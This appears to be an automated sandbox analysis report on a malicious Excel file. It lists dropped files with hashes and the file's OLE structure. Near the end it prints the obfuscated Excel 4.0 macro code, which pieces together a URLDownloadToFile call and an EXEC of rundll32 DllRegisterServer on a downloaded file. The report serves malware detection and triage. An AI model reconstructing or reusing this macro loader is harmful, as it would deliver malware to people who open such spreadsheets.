                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):328
                    Entropy (8bit):3.084754685484955
                    Encrypted:false
                    SSDEEP:6:kKxysPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:5yv3kPlE99SNxAhUeo+aKt
                    MD5:EEAC39EA5331BA303E68BBDD882ADCA6
                    SHA1:5F83BB30297D7995917BD67BFFA69D94FA6DCEE5
                    SHA-256:42E7CEFF41646464D6345C40BB70A027488339C3B1FD20CFFA8CA19DA22EFB30
                    SHA-512:40A918F4C0CD266667869407B5453F55D740F6232D271ABFA20FC260F4F0FFF5FC8DAF9C28558741A9F09D15B8EE93681EACE57BC559222EF4B2FEE925CB3095
                    Malicious:false
                    Reputation:low
                    Preview: p...... ..........K....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CD13771E5132C64BEEF257719A4363C4
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):218
                    Entropy (8bit):2.9160266983784964
                    Encrypted:false
                    SSDEEP:3:kkFklvBPtfllXlE/zMclittFFr31kRDHulDZLcoi1yo1dlUKlGW1/:kKeBPq1QiRDOlDeb1y+UKcK
                    MD5:717AB1416592925CC18663F80CDFE1C4
                    SHA1:869238FE2FB612791255160C4DC56E67DEEE250C
                    SHA-256:228638ABAEA3EFFAF4E5C7788B805431E820E2CBE95B7A9FA9DA73FAD85A8020
                    SHA-512:C254BEA17E7851914A7A513A14B62C2EAA6A48893A363643875717718329F6BFEDACAB9B2382BE0F0BCFC1B864FB443C3107B6578C491253C0C139DEF1B6F2FC
                    Malicious:false
                    Reputation:low
                    Preview: p...... ....H...%.FK....(....................................................... ..........~...@...................h.t.t.p.:././.c.e.r.t...i.n.t.-.x.1...l.e.t.s.e.n.c.r.y.p.t...o.r.g./...".5.a.6.2.8.1.5.c.-.4.a.c."...
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):252
                    Entropy (8bit):3.0294634724686764
                    Encrypted:false
                    SSDEEP:3:kkFklWZPtfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKNPnliBAIdQZV7eAYLit
                    MD5:889812E029148036DB54C56A370BF52A
                    SHA1:5F50C6B33BC205351966658FB63CC2D44B8B7EC1
                    SHA-256:58A61FF80EE210E555AD05B86F7C8621F1D97DC5F54A823DCDC6C76FD76AEEC8
                    SHA-512:7F78DC35748746B7A991F36B50AE1C76BE8187AFA37D1877279C7704698814C1C6E90ED8166ABE748CE9907434C8771E7C939551F1678B8AEC20B807A8231E27
                    Malicious:false
                    Reputation:low
                    Preview: p...... ....`.....K....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                    C:\Users\user\AppData\Local\Temp\2BBE0000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):63666
                    Entropy (8bit):7.680209141266392
                    Encrypted:false
                    SSDEEP:1536:AVAWd9RqrMMz9Sw3xNhVsSAc2frW2Z1llo:AqWdzqLTnjsSAc2frW2XlW
                    MD5:700CF16F61668BC891925220CB8C45D4
                    SHA1:C4B8150813677A0D1A9AD745C5A194CD317A9AD5
                    SHA-256:9BCA582BD5E6437C93F5BEAC3C1C847782923021E60747D51337FDEBA87E3C33
                    SHA-512:F952BB6CBD612AD8C14D1C02629B176B306EBE4C31FBF0B8298E2109FD297C7C861DC8AA1F3E360D05A18C179C2DF9333903F246190B10DBACA665F6EEE5635D
                    Malicious:false
                    Reputation:low
                    Preview: .UKO.0..#.."_Q..a.Z5..G......4..<....c7.....y9.c..'..5.3D........J..e..o..$...;h...]O.....X..a..../.Q.`.6>.....V$....B.E..j4...w.\.S.`.....'....=^9..c...{Y.e.f|~."..m D.FK..4......fZ......C....H.4!j... %..whF0x..CC.b.{......W>..........^.t',......8.z?o...h,..`.R.c......Z..:.T..........n.J......`..g.6..?..X>#wuD.K........4...4.G.sJ/W...{.A=$...x.}....%[....s.....H..> ......:b2..D.1iX..m[x.H..t..A.y.+P[.y.kL........PK..........!........v.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\CabD03B.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                    Category:dropped
                    Size (bytes):59134
                    Entropy (8bit):7.995450161616763
                    Encrypted:true
                    SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                    MD5:E92176B0889CC1BB97114BEB2F3C1728
                    SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                    SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                    SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                    C:\Users\user\AppData\Local\Temp\TarD03C.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):152788
                    Entropy (8bit):6.316654432555028
                    Encrypted:false
                    SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                    MD5:64FEDADE4387A8B92C120B21EC61E394
                    SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                    SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                    SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Feb 21 23:54:33 2021, atime=Sun Feb 21 23:54:33 2021, length=8192, window=hide
                    Category:dropped
                    Size (bytes):867
                    Entropy (8bit):4.495716913593311
                    Encrypted:false
                    SSDEEP:12:85Q/LgXg/XAlCPCHaX7B8NB/QY3UX+WnicvbjbDtZ3YilMMEpxRljKfkcTdJP9TK:85o/XTr6NUYebDv3qekwrNru/
                    MD5:E12BEE9E20A696477746D5F44BB148D9
                    SHA1:206C61524DCC3BFADF63CC72949D7099546E2D32
                    SHA-256:7CE1439063814D6F21A651A40E0EFF007FF110B0F7FBFB35249B3DC87EFD40D8
                    SHA-512:0A22CBEFE98822EE4BA90C39CE10AEDCD7292EE2E1506DCAE62BE5A35BC03190B4EF93BA501D81AD4236C00696571E1086ECF1A14A032D816FED7DC10B280A74
                    Malicious:false
                    Reputation:low
                    Preview: L..................F...........7G..z.H....z.H..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....VR....Desktop.d......QK.XVR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......609290..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1900770373.LNK
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:11 2020, mtime=Sun Feb 21 23:54:33 2021, atime=Sun Feb 21 23:54:33 2021, length=90112, window=hide
                    Category:dropped
                    Size (bytes):2118
                    Entropy (8bit):4.515941059744255
                    Encrypted:false
                    SSDEEP:48:8j/XT+NnDLyCgLVekwQh2j/XT+NnDLyCgLVekwQ/:8j/X6Nn8e3Qh2j/X6Nn8e3Q/
                    MD5:AA7DA2F11BCCE0F1907562D8927A929E
                    SHA1:C4EBE836AFF376566387ADAEFD89C6CA17A0BC60
                    SHA-256:908EBF9A4A447F1B2A6EA847D0C7D46C57E62E709D6B611CDFA2636AD4B8421A
                    SHA-512:54CF322175CCAD2CD9D7D1A60C46478308DAA167E1CE115C22408D814C85EF561049AC70EC4A039F6893DBBA051C75E27A663B4E7FEAA0A6352439F056D628FC
                    Malicious:false
                    Reputation:low
                    Preview: L..................F.... ........{..z.H.......H.....`...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..b..VR.. .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.9.0.0.7.7.0.3.7.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop\document-1900770373.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.9.0.0.7.7.0.3.7.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......609290..........D_....3N.
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):110
                    Entropy (8bit):4.618101950967686
                    Encrypted:false
                    SSDEEP:3:oyBVomMY9LRCSEWCZELRCSEWCmMY9LRCSEWCv:dj6Y9L4SEWgEL4SEWUY9L4SEWs
                    MD5:272B1562977081250539767E3399438F
                    SHA1:E87F8BFACFFDA4A3CE7996758C15638EAB13AEEC
                    SHA-256:1CC134C7A3B67DC666D5784FFCCB1829E009872CEE863DBED2F03B72065AF66B
                    SHA-512:6681F96328D00E72A221D9CCDD79DB279BE909C49B84713442D996CFDB4E6E2DDE37B39D0AE56CE5E6019D7642BD6643610175606A8043456358D610A7CC6436
                    Malicious:false
                    Reputation:low
                    Preview: Desktop.LNK=0..[xls]..document-1900770373.LNK=0..document-1900770373.LNK=0..[xls]..document-1900770373.LNK=0..
                    C:\Users\user\Desktop\CBBE0000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Applesoft BASIC program data, first line number 16
                    Category:dropped
                    Size (bytes):123533
                    Entropy (8bit):4.297044532127987
                    Encrypted:false
                    SSDEEP:3072:NWcKoSsxzNDZLDZjlbR868O8KL5L+LxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAFVn:ccKoSsxzNDZLDZjlbR868O8KL5L+LxEq
                    MD5:8629CE00F391281A44C231AFE0CA74CB
                    SHA1:3CAABA6FF240667682D4EC63A8C56306C7C32506
                    SHA-256:6321FB6481A8997198C3B2E23DF71C3CDBCD27CA39633B917DF84D3FE20A28B2
                    SHA-512:DEB00190B4E31372D52008D70C672916A208D0878E9D22EA9909C65F7B0B38BE4582054F5DA8D28A1C0029EE7A33429093BA4529C09277C1694F76C657EE4A27
                    Malicious:false
                    Reputation:low
                    Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                    Static File Info

                    General

                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 09:51:20 2021, Security: 0
                    Entropy (8bit):3.4266889115734442
                    TrID:
                    • Microsoft Excel sheet (30009/1) 78.94%
                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                    File name:document-1900770373.xls
                    File size:90624
                    MD5:139a10b28479f4f9e2e4465053e039f8
                    SHA1:10251eb69e603ed7259265015b71b1160e3b4a06
                    SHA256:ed17094f3e820674c9fa18192292108e8766d28eb0afcc0cf350a44b54196c1d
                    SHA512:a37e69ad6fad31c7c39dd263d59758230e29add9c93b59d747dc4616fcf0c4ced09293a9d5e3fe633712311e4347483983fba5a713193f660b8f0fda2320cb88
                    SSDEEP:1536:RLcKoSsxz1PDZLDZjlbR868O8KlVH327uDphYHceXVhca+fMHLtyeGxcl8O9pTIw:RLcKoSsxzNDZLDZjlbR868O8KlVH327R
                    File Content Preview:........................>......................................................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4eea286a4b4bcb4

                    Static OLE Info

                    General

                    Document Type:OLE
                    Number of OLE Files:1

                    OLE File "document-1900770373.xls"

                    Indicators

                    Has Summary Info:True
                    Application Name:Microsoft Excel
                    Encrypted Document:False
                    Contains Word Document Stream:False
                    Contains Workbook/Book Stream:True
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:True

                    Summary

                    Code Page:1251
                    Author:
                    Last Saved By:
                    Create Time:2006-09-16 00:00:00
                    Last Saved Time:2021-02-18 09:51:20
                    Creating Application:Microsoft Excel
                    Security:0

                    Document Summary

                    Document Code Page:1251
                    Thumbnail Scaling Desired:False
                    Contains Dirty Links:False
                    Shared Document:False
                    Changed Hyperlinks:False
                    Application Version:917504

                    Streams

                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                    General
                    Stream Path:\x5DocumentSummaryInformation
                    File Type:data
                    Stream Size:4096
                    Entropy:0.318330155209
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 1 . . . . . D o c 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 9f 00 00 00 02 00 00 00 e3 04 00 00
                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                    General
                    Stream Path:\x5SummaryInformation
                    File Type:data
                    Stream Size:4096
                    Entropy:0.254255489206
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 79968
                    General
                    Stream Path:Workbook
                    File Type:Applesoft BASIC program data, first line number 16
                    Stream Size:79968
                    Entropy:3.63805791013
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                    Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                    Macro 4.0 Code

                    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=before.2.4.0.sheet!AK28(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(AP41&""2 "",AD15)","=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(AQ41,AE15)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AE14(),=Doc2!AC12(),,,"=FORMULA(AO36&AO37&AO38&AO39&AO40&AO41,AO25)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AG24(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(AO25,Doc2!AC13&Doc2!AC12&AG25&""A"",""JJC""&""CBB"",0,before.2.4.0.sheet!A100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&before.2.4.0.sheet!AQ30,0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AO5(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REPLACE(before.2.4.0.sheet!AQ25,6,1,before.2.4.0.sheet!AQ26)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REPLACE(AP34,6,1,before.2.4.0.sheet!AL12)",,,,,,,,URLMon,,egist,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AK22(),,,,,,,,,,erServer,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(before.2.4.0.sheet!AD15&before.2.4.0.sheet!AQ30&before.2.4.0.sheet!AE15&AG24)",,,,r,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,u,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,l,..\idefje.ekfd,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,File,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Dow,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,URL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,rundll3,",DllR",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,